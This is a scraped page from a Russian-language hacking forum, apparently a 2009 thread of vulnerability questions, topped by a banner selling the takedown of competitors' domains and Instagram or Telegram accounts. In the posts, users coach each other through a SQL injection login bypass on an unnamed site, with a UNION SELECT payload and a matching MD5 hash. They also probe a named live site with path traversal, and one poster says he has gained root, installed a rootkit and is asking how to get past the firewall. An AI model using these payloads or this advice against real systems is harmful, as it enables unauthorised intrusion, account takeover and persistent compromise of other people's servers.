УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 914 из 1393

914

Опции темы

Поиск в этой теме

Опции просмотра

#9131

27.09.2009, 22:51

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Отправить сообщение для L I G A с помощью ICQ

Цитата:

Сообщение от mailbrush

Shadrin, .ht* только для apache!

Есть бажный сайт, при подставке кавычки в авторизацию пишет

Код:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]

Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...

пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.

#9132

27.09.2009, 22:57

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от L I G A

пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.

Запрос НЕ многострочный:
1. Запрос видно в ошибке.
2. Если бы я обрезал только одну строку комментарием #, то была бы ошибка.
3. Комментарий /* режет.

#9133

27.09.2009, 23:08

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

посмотри на запрос, у тебя он возвращает любой поле
авторизация (например) [данные-из-какой-то-колонки-customers]+pass
юзай вывод в ошибках
/add более подробно написано ниже)

Последний раз редактировалось l1ght; 27.09.2009 в 23:23..

#9134

27.09.2009, 23:09

oRb

Members of Antichat - Level 5

Регистрация: 09.05.2008

Сообщений: 304

Провел на форуме:
7875940

Репутация: 2362

Цитата:

Сообщение от mailbrush

Есть бажный сайт, при подставке кавычки в авторизацию пишет

Код:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]

Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...

mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:

PHP код:


		
			
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");

$item = mysql_fetch_array($res);

if(md5($_POST['password']) == $item['password']) {

echo "LOGINED"!

} else {

echo "FAIL!";

}

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty

__________________
включи голову

#9135

27.09.2009, 23:19

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Цитата:

Сообщение от oRb

PHP код:


		
			
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");

$item = mysql_fetch_array($res);

if(md5($_POST['password']) == $item['password']) {

echo "LOGINED"!

} else {

echo "FAIL!";

}

Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял

#9136

28.09.2009, 02:08

Merl00k

Познающий

Регистрация: 06.11.2008

Сообщений: 32

Провел на форуме:
934986

Репутация: 21

Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)

#9137

28.09.2009, 02:15

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

Сообщение от Merl00k

Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)

Похоже на LFI

Последний раз редактировалось wolmer; 28.09.2009 в 02:21..

#9138

28.09.2009, 02:37

Merl00k

Познающий

Регистрация: 06.11.2008

Сообщений: 32

Провел на форуме:
934986

Репутация: 21

wolmer

мнеб по подробнее если можно

#9139

28.09.2009, 02:42

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

вот так поинтересней будет:

Код:

http://www.sys-tema.ru/index.jsp?pk=../

раскрытие пути, в исходниках

#9140

28.09.2009, 05:29

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

поднял рута, заинсталил руткит (tuxkit)... пытаюсь подконектиться, фаер блочит тупо. что посоветуете? как от него избавиться?

Страница 914 из 1393

914

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход